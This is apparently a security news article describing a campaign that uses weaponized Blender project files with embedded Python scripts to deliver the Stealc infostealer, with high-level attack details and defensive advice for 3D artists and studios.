Malicious Blender models now threaten 3D artists and developers through weaponized project files that deliver the Stealc infostealer. Attackers use these infected assets to compromise creative pipelines and steal valuable credentials. The campaign shows how threat actors shift toward tools used in digital content creation to reach high-value targets.
How the Attack Works
Security researchers uncovered infected .blend files that execute hidden Python scripts. These scripts activate when users open the projects inside Blender. The payload then downloads Stealc, a known infostealing malware that collects credentials, browser data, crypto wallet keys, and session tokens. The attack relies on the trust many designers place in shared assets and community marketplaces.
Weaponized .blend Files
Attackers embed Python functions into the project files. Blender loads these functions during startup if scripting permissions remain enabled. The feature supports legitimate automation, yet threat actors now exploit it to run silent commands. Users who download models from unknown sources risk immediate compromise.
Stealc Malware Capabilities
Stealc specializes in data theft. The malware scans multiple directories, browser storage areas, and application folders. It extracts crypto wallets, saved passwords, cookies, and autofill text. The malware also sends harvested data to remote servers controlled by the attackers. Victims often remain unaware until accounts show suspicious activity.
Distribution Channels
Attackers share malicious Blender models through forums, asset repositories, and direct messages. Creative communities often rely on shared resources, which increases the impact. Some malicious files mimic professional work to gain trust. Artists who work on commercial or gaming projects face higher risk because compromised credentials may grant access to development servers or cloud repositories.
Targeting Creative Professionals
Many targeted users work in industries where access to assets and tools remains essential. That includes gaming studios, VFX teams, and independent artists. Compromised accounts can expose source files, internal tools, and unfinished projects. Attackers may sell this material on underground markets or use it for further intrusions.
Technical Details of the Attack
Researchers noted that the payload uses multi-stage scripts. The initial Python code loads external content from attacker-controlled servers. The next stage downloads Stealc and places it into hidden directories. The malware then establishes persistence through scheduled tasks or autorun entries. This process keeps the system infected even after restarting.
Evasion Techniques
Attackers designed the malicious Blender models to bypass simple detection. The Python scripts remain short and obscure. Some payloads use obfuscation that blends with regular automation tools. Many antivirus engines still lack signatures for these infections. Users may not notice anything unusual because the models open normally.
Why This Campaign Matters
The attack highlights shifting threat landscapes. Creative tools now present valuable entry points into professional environments. Many artistic workflows involve collaborative exchange, which increases the chance of downloading infected assets. Malicious Blender models show how threat actors adapt their payloads to new platforms and new communities.
How Users Can Protect Themselves
3D artists can reduce risk by disabling auto-execution for Blender scripts. Users should also check the source of every downloaded asset and scan files with updated security tools. Studios can enforce stricter guidelines for asset imports. Multi-factor authentication can also reduce the impact of stolen credentials.
Safe Asset Handling Practices
- Download models only from trusted marketplaces.
- Verify authors before importing project files.
- Disable script auto-run unless required.
- Store critical files in controlled directories.
- Audit new assets before adding them to pipelines.
Final Thoughts
Malicious Blender models reveal a growing threat to artistic and development communities. Attackers use these infected project files to deploy Stealc malware and steal valuable credentials. Strong asset hygiene, careful source verification, and better scripting controls can reduce risk. Creative teams that depend on shared resources must stay alert as attackers continue to exploit overlooked tools.
